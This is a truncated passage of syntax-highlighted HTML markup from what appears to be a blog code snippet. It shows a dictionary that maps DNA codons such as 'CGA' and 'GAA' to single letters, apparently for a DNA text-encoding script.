class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: #1e1e1e; color: #d69d85; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">'CCT'</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">: </span><span style="background-color: #1e1e1e; color: #d69d85; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">'x'</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">,</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: #1e1e1e; color: #d69d85; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">'CGA'</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">: </span><span style="background-color: #1e1e1e; color: #d69d85; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">'y'</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">,</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: #1e1e1e; color: #d69d85; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">'CGC'</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">: </span><span style="background-color: #1e1e1e; color: #d69d85; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">'z'</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">,</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: #1e1e1e; color: #d69d85; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">'CGG'</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">: </span><span style="background-color: #1e1e1e; color: #d69d85; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">'A'</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">,</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: #1e1e1e; color: #d69d85; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">'CGT'</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">: </span><span style="background-color: #1e1e1e; color: #d69d85; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">'B'</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">,</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: #1e1e1e; color: #d69d85; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">'CTA'</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">: </span><span style="background-color: #1e1e1e; color: #d69d85; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">'C'</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">,</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: #1e1e1e; color: #d69d85; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">'CTC'</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">: </span><span style="background-color: #1e1e1e; color: #d69d85; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">'D'</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">,</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: #1e1e1e; color: #d69d85; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">'CTG'</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">: </span><span style="background-color: #1e1e1e; color: #d69d85; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">'E'</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">,</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: #1e1e1e; color: #d69d85; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">'CTT'</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">: </span><span style="background-color: #1e1e1e; color: #d69d85; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">'F'</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">,</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: #1e1e1e; color: #d69d85; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">'GAA'</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">: </span><span style="background-color: #1e1e1e; color: #d69d85; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">'G'</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">,</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: #1e1e1e; color: #d69d85; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">'GAC'</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">: </span><span style="background-color: #1e1e1e; color: #d69d85; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">'H'</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">,</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: #1e1e1e; color: #d69d85; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">'GAG'</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">: </span><span style="background-color: #1e1e1e; color: #d69d85; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">'I'</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">,</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: #1e1e1e; color: #d69d85; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">'GAT'</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">: </span><span style="background-color: #1e1e1e; color: #d69d85; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">'J'</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">,</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: #1e1e1e; color: #d69d85; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">'GCA'</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">: </span><span style="background-color: #1e1e1e; color: #d69d85; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">'K'</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">,</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: #1e1e1e; color: #d69d85; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">'GCC'</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">: </span><span style="background-color: #1e1e1e; color: #d69d85; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">'L'</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">,</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: #1e1e1e; color: #d69d85; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">'GCG'</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">: </span><span style="background-color: #1e1e1e; color: #d69d85; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">'M'</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">,</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: #1e1e1e; color: #d69d85; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">'GCT'</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">: </span><span style="background-color: #1e1e1e; color: #d69d85; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">'N'</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">,</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: #1e1e1e; color: #d69d85; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">'GGA'</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">: </span><span style="background-color: #1e1e1e; color: #d69d85; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">'O'</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">,</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: #1e1e1e; color: #d69d85; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">'GGC'</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">: </span><span style="background-color: #1e1e1e; color: #d69d85; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">'P'</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">,</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: #1e1e1e; color: #d69d85; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">'GGG'</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">: </span><span style="background-color: #1e1e1e; color: #d69d85; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: 